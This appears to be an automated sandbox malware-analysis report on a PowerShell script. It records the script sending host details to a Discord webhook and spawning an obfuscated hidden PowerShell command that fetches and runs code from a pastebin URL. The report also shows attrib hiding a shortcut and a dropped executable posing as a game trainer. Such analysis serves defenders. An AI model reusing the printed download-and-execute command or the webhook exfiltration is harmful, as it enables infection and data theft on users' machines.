                                                                                    Content-Length: 300
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 16:08:41 UTC300OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 66 72 6f 6e 74 64 65 73 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 36 48 4b 47 5a 42 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20
                                                                                    Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** 6HKGZB\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC
                                                                                    2024-10-15 16:08:42 UTC1259INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 15 Oct 2024 16:08:41 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 45
                                                                                    Connection: close
                                                                                    Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                    x-ratelimit-limit: 5
                                                                                    x-ratelimit-remaining: 4
                                                                                    x-ratelimit-reset: 1729008523
                                                                                    x-ratelimit-reset-after: 1
                                                                                    via: 1.1 google
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gCDeVYfG8MOB0FTSV0UaeFLhjp7PDyjKfLCFzNYSi2LWR1vejx2IA%2FAKTlNsTQA%2BFioU%2FubTwFF92vNbWie4qWxEDWEb3XGiD%2B7wz99RzoTzgAB%2FBWI1Mjq0sZc5"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Set-Cookie: __cfruid=bd1d45b24ccd9896b6e9876f8b878c373fe51f19-1729008521; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                    Set-Cookie: _cfuvid=XJWZftbrpRr34.ddkGfOILwNBMWYYtEwVHX6y4K6hok-1729008521994-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d3111bddf3ea915-DFW
                                                                                    2024-10-15 16:08:42 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                    Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.749889162.159.138.2324437912C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-15 16:08:49 UTC311OUTPOST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Content-Type: application/json
                                                                                    Host: discord.com
                                                                                    Content-Length: 300
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 16:08:49 UTC300OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 66 72 6f 6e 74 64 65 73 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 36 48 4b 47 5a 42 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20
                                                                                    Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** 6HKGZB\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC
                                                                                    2024-10-15 16:08:49 UTC1253INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 15 Oct 2024 16:08:49 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 45
                                                                                    Connection: close
                                                                                    Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                    x-ratelimit-limit: 5
                                                                                    x-ratelimit-remaining: 4
                                                                                    x-ratelimit-reset: 1729008530
                                                                                    x-ratelimit-reset-after: 1
                                                                                    via: 1.1 google
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bmW9a6ZzW6OZtWv4mx158Rhhm7zAR9pDtYeqopVf8louXs4yLTmZHQ3cLwwS7oNaoxDob4YR9htr06zB%2FyJ9p2MobYR1zHRVImJaIGYUR%2FPWoxMFRUpeN1GBuLjA"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Set-Cookie: __cfruid=0968388ccef6ec26a57a8a0fca07deaa13e0c211-1729008529; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                    Set-Cookie: _cfuvid=Zg1_cvnTkrEezowrmdGcWuRIEpyS1qc_JH3ww76STdM-1729008529315-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d3111eb984d6be9-DFW
                                                                                    2024-10-15 16:08:49 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                    Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:12:08:04
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm3.ps1"
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:12:08:04
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff75da10000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:12:08:07
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dwdaoju2\dwdaoju2.cmdline"
                                                                                    Imagebase:0x7ff744f20000
                                                                                    File size:2'759'232 bytes
                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:5
                                                                                    Start time:12:08:08
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD0F0.tmp" "c:\Users\user\AppData\Local\Temp\dwdaoju2\CSC6D3B5E607DDC4941A0658A6CD27B5246.TMP"
                                                                                    Imagebase:0x7ff6889b0000
                                                                                    File size:52'744 bytes
                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:12:08:12
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\Stand_Trainer_Updated.exe"
                                                                                    Imagebase:0x22d07850000
                                                                                    File size:56'320 bytes
                                                                                    MD5 hash:BECD67D75C5E7C2411E9F481086CA1E0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 0%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:7
                                                                                    Start time:12:08:12
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                    Imagebase:0x7ff7b4ee0000
                                                                                    File size:55'320 bytes
                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:9
                                                                                    Start time:12:08:21
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\forfiles.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                                    Imagebase:0x7ff7dd590000
                                                                                    File size:52'224 bytes
                                                                                    MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:10
                                                                                    Start time:12:08:21
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff75da10000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:11
                                                                                    Start time:12:08:22
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:12
                                                                                    Start time:12:08:22
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:13
                                                                                    Start time:12:08:22
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                                    Imagebase:0x7ff7df7c0000
                                                                                    File size:23'040 bytes
                                                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:14
                                                                                    Start time:14:08:26
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\forfiles.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                                    Imagebase:0x7ff7dd590000
                                                                                    File size:52'224 bytes
                                                                                    MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:15
                                                                                    Start time:14:08:26
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff75da10000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:16
                                                                                    Start time:14:08:26
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:17
                                                                                    Start time:14:08:26
                                                                                    Start date:15/10/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:3.2%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:3
                                                                                      Total number of Limit Nodes:0
                                                                                      execution_graph 10838 7ffaac64aaa4 10839 7ffaac64aaad LoadLibraryExW 10838->10839 10841 7ffaac64ab5d 10839->10841

                                                                                      Executed Functions

                                                                                      Function 00007FFAAC63F9A6 Relevance: 3.0, Strings: 2, Instructions: 472COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 181 7ffaac63f9a6-7ffaac63f9b3 182 7ffaac63f9be-7ffaac63fa87 181->182 183 7ffaac63f9b5-7ffaac63f9bd 181->183 186 7ffaac63faf3 182->186 187 7ffaac63fa89-7ffaac63fa92 182->187 183->182 188 7ffaac63faf5-7ffaac63fb1a 186->188 187->186 189 7ffaac63fa94-7ffaac63faa0 187->189 196 7ffaac63fb1c-7ffaac63fb25 188->196 197 7ffaac63fb86 188->197 190 7ffaac63faa2-7ffaac63fab4 189->190 191 7ffaac63fad9-7ffaac63faf1 189->191 193 7ffaac63fab8-7ffaac63facb 190->193 194 7ffaac63fab6 190->194 191->188 193->193 195 7ffaac63facd-7ffaac63fad5 193->195 194->193 195->191 196->197 198 7ffaac63fb27-7ffaac63fb33 196->198 199 7ffaac63fb88-7ffaac63fc30 197->199 200 7ffaac63fb6c-7ffaac63fb84 198->200 201 7ffaac63fb35-7ffaac63fb47 198->201 210 7ffaac63fc9e 199->210 211 7ffaac63fc32-7ffaac63fc3c 199->211 200->199 203 7ffaac63fb4b-7ffaac63fb5e 201->203 204 7ffaac63fb49 201->204 203->203 206 7ffaac63fb60-7ffaac63fb68 203->206 204->203 206->200 213 7ffaac63fca0-7ffaac63fcc9 210->213 211->210 212 7ffaac63fc3e-7ffaac63fc4b 211->212 214 7ffaac63fc4d-7ffaac63fc5f 212->214 215 7ffaac63fc84-7ffaac63fc9c 212->215 219 7ffaac63fccb-7ffaac63fcd6 213->219 220 7ffaac63fd33 213->220 217 7ffaac63fc61 214->217 218 7ffaac63fc63-7ffaac63fc76 214->218 215->213 217->218 218->218 221 7ffaac63fc78-7ffaac63fc80 218->221 219->220 222 7ffaac63fcd8-7ffaac63fce6 219->222 223 7ffaac63fd35-7ffaac63fddb 220->223 221->215 224 7ffaac63fd1f-7ffaac63fd31 222->224 225 7ffaac63fce8-7ffaac63fcfa 222->225 232 7ffaac63fddd 223->232 233 7ffaac63fde3-7ffaac63fe1d call 7ffaac63fe64 223->233 224->223 226 7ffaac63fcfc 225->226 227 7ffaac63fcfe-7ffaac63fd11 225->227 226->227 227->227 229 7ffaac63fd13-7ffaac63fd1b 227->229 229->224 232->233 239 7ffaac63fe22-7ffaac63fe48 233->239 240 7ffaac63fe4a 239->240 241 7ffaac63fe4f-7ffaac63fe63 239->241 240->241
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1557608225.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac630000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: :U&-$:U&-
                                                                                      • API String ID: 0-271457029
                                                                                      • Opcode ID: 70c6eddfe5ec2a4dfd8607b6684dc455167fa46dddf14bd73af99acc91276603
                                                                                      • Instruction ID: 2734458584ebf0e684555960127a1c7f36e951d2b1a2e26553c0cea39ea21585
                                                                                      • Opcode Fuzzy Hash: 70c6eddfe5ec2a4dfd8607b6684dc455167fa46dddf14bd73af99acc91276603
                                                                                      • Instruction Fuzzy Hash: 8AF1C570508A8D8FEBA9DF28C8557E937D1FF59310F0492AEE84DC7291CB34D8458B82
                                                                                      Function 00007FFAAC640752 Relevance: 3.0, Strings: 2, Instructions: 459COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 242 7ffaac640752-7ffaac64075f 243 7ffaac64076a-7ffaac640837 242->243 244 7ffaac640761-7ffaac640769 242->244 247 7ffaac6408a3 243->247 248 7ffaac640839-7ffaac640842 243->248 244->243 249 7ffaac6408a5-7ffaac6408ca 247->249 248->247 250 7ffaac640844-7ffaac640850 248->250 256 7ffaac6408cc-7ffaac6408d5 249->256 257 7ffaac640936 249->257 251 7ffaac640852-7ffaac640864 250->251 252 7ffaac640889-7ffaac6408a1 250->252 254 7ffaac640868-7ffaac64087b 251->254 255 7ffaac640866 251->255 252->249 254->254 258 7ffaac64087d-7ffaac640885 254->258 255->254 256->257 259 7ffaac6408d7-7ffaac6408e3 256->259 260 7ffaac640938-7ffaac64095d 257->260 258->252 261 7ffaac64091c-7ffaac640934 259->261 262 7ffaac6408e5-7ffaac6408f7 259->262 266 7ffaac6409cb 260->266 267 7ffaac64095f-7ffaac640969 260->267 261->260 263 7ffaac6408fb-7ffaac64090e 262->263 264 7ffaac6408f9 262->264 263->263 268 7ffaac640910-7ffaac640918 263->268 264->263 270 7ffaac6409cd-7ffaac6409fb 266->270 267->266 269 7ffaac64096b-7ffaac640978 267->269 268->261 271 7ffaac64097a-7ffaac64098c 269->271 272 7ffaac6409b1-7ffaac6409c9 269->272 277 7ffaac6409fd-7ffaac640a08 270->277 278 7ffaac640a6b 270->278 273 7ffaac640990-7ffaac6409a3 271->273 274 7ffaac64098e 271->274 272->270 273->273 276 7ffaac6409a5-7ffaac6409ad 273->276 274->273 276->272 277->278 280 7ffaac640a0a-7ffaac640a18 277->280 279 7ffaac640a6d-7ffaac640b5a 278->279 291 7ffaac640b5c 279->291 292 7ffaac640b62-7ffaac640b7c 279->292 281 7ffaac640a1a-7ffaac640a2c 280->281 282 7ffaac640a51-7ffaac640a69 280->282 284 7ffaac640a30-7ffaac640a43 281->284 285 7ffaac640a2e 281->285 282->279 284->284 286 7ffaac640a45-7ffaac640a4d 284->286 285->284 286->282 291->292 295 7ffaac640b85-7ffaac640bc4 call 7ffaac640be0 292->295 299 7ffaac640bcb-7ffaac640bdf 295->299 300 7ffaac640bc6 295->300 300->299
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1557608225.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac630000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: :U&-$:U&-
                                                                                      • API String ID: 0-271457029
                                                                                      • Opcode ID: 126337ad6fa6e2d8cc980f7f19142394772a0b36d6bc09ed9474630ac4479340
                                                                                      • Instruction ID: a0978b9cd5be64d79b94fa05cc49e615bbf61b6defdc50a5ccc9ea3465eace5a
                                                                                      • Opcode Fuzzy Hash: 126337ad6fa6e2d8cc980f7f19142394772a0b36d6bc09ed9474630ac4479340
                                                                                      • Instruction Fuzzy Hash: C3E1E330908A4E8FEBA9DF28C9557E977D1FB59310F04926ED84DC7291DE78E8848BC1
                                                                                      Function 00007FFAAC708341 Relevance: 6.9, Strings: 5, Instructions: 610COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 7ffaac708341-7ffaac70834d 1 7ffaac70834f 0->1 2 7ffaac708351-7ffaac70838f 0->2 1->2 3 7ffaac708391-7ffaac7083c5 1->3 2->3 7 7ffaac7083cb-7ffaac7083d5 3->7 8 7ffaac7084c3-7ffaac708567 3->8 9 7ffaac7083ee-7ffaac7083f2 7->9 10 7ffaac7083d7-7ffaac7083ec 7->10 24 7ffaac70856d-7ffaac708577 8->24 25 7ffaac708837-7ffaac70886d 8->25 13 7ffaac70846d-7ffaac708477 9->13 14 7ffaac7083f4-7ffaac7083f7 9->14 10->9 17 7ffaac708483-7ffaac7084c0 13->17 18 7ffaac708479-7ffaac708482 13->18 14->13 16 7ffaac7083f9-7ffaac708402 14->16 16->13 17->8 26 7ffaac708593-7ffaac7085a0 24->26 27 7ffaac708579-7ffaac708591 24->27 40 7ffaac70886f-7ffaac708897 25->40 41 7ffaac708898-7ffaac7088d8 25->41 34 7ffaac7087d3-7ffaac7087dd 26->34 35 7ffaac7085a6-7ffaac7085a9 26->35 27->26 37 7ffaac7087ec-7ffaac708834 34->37 38 7ffaac7087df-7ffaac7087eb 34->38 35->34 39 7ffaac7085af-7ffaac7085bb 35->39 37->25 39->25 44 7ffaac7085c1-7ffaac7085cb 39->44 40->41 46 7ffaac7085cd-7ffaac7085da 44->46 47 7ffaac7085e4-7ffaac7085e9 44->47 46->47 53 7ffaac7085dc-7ffaac7085e2 46->53 47->34 52 7ffaac7085ef-7ffaac7085f4 47->52 54 7ffaac70860f 52->54 55 7ffaac7085f6-7ffaac70860d 52->55 53->47 58 7ffaac708611-7ffaac708613 54->58 55->58 58->34 60 7ffaac708619-7ffaac70861c 58->60 61 7ffaac70861e-7ffaac708641 60->61 62 7ffaac708643 60->62 63 7ffaac708645-7ffaac708647 61->63 62->63 63->34 65 7ffaac70864d-7ffaac708692 63->65 65->34 73 7ffaac708698-7ffaac7086a8 65->73 74 7ffaac7086aa-7ffaac7086b4 73->74 75 7ffaac7086b8 73->75 77 7ffaac7086d4-7ffaac7086f2 74->77 78 7ffaac7086b6 74->78 76 7ffaac7086bd-7ffaac7086ca 75->76 76->77 82 7ffaac7086cc-7ffaac7086d2 76->82 77->75 81 7ffaac7086f4-7ffaac7086fe 77->81 78->76 83 7ffaac708700-7ffaac708715 81->83 84 7ffaac708717-7ffaac708785 81->84 82->77 83->84 93 7ffaac7087a5-7ffaac7087a6 84->93 94 7ffaac708787-7ffaac7087a3 84->94 96 7ffaac7087ae-7ffaac7087ba 93->96 94->93 98 7ffaac7087bc-7ffaac7087c0 96->98 99 7ffaac7087c2-7ffaac7087c7 96->99 100 7ffaac7087c8-7ffaac7087d2 98->100 99->100
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1558308632.00007FFAAC700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC700000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac700000_powershell.jbxd
                                                                                      Similarity
